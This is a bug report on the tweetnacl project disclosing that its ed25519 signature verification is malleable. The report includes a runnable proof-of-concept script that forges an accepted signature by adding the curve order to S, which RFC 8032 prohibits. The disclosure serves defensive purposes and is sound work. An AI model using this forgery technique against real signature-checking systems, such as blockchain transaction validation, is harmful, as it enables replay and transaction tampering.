ed25519 verification is malleable and accepts forged signatures #253
Description
tweetnacl ed25519 signature verification is malleable and does not have SUF-CMA (strong unforgeability under chosen message attacks). Malleability is problematic in blockchain context. MtGox was hacked because of it.
// mkdir test && cd test && npm init -y && npm install @noble/curves@1.0.0 tweetnacl@1.0.3
// touch demo.mjs; then node demo.mjs
import { ed25519 } from '@noble/curves/ed25519';
import { bytesToNumberLE, numberToBytesLE } from '@noble/curves/abstract/utils';
import { default as nacl } from 'tweetnacl';
const priv = ed25519.utils.randomPrivateKey();
const pub = ed25519.getPublicKey(priv);
const msg = new TextEncoder().encode('hello world');
const sig = ed25519.sign(msg, priv);
const [R, s] = [sig.slice(0, 32), sig.slice(32, 64)];
const s_forged = numberToBytesLE(bytesToNumberLE(s) + ed25519.CURVE.n, 32);
const sig_forged = new Uint8Array([...R, ...s_forged]);
console.log('reference', ed25519.verify(sig, msg, pub), ed25519.verify(sig_forged, msg, pub));
console.log('nacl', nacl.sign.detached.verify(msg, sig, pub), nacl.sign.detached.verify(msg, sig_forged.slice(), pub));The behavior defies RFC 8032, which prohibits S >= L. Folks in 2020/1244.pdf also mentioned similar stuff.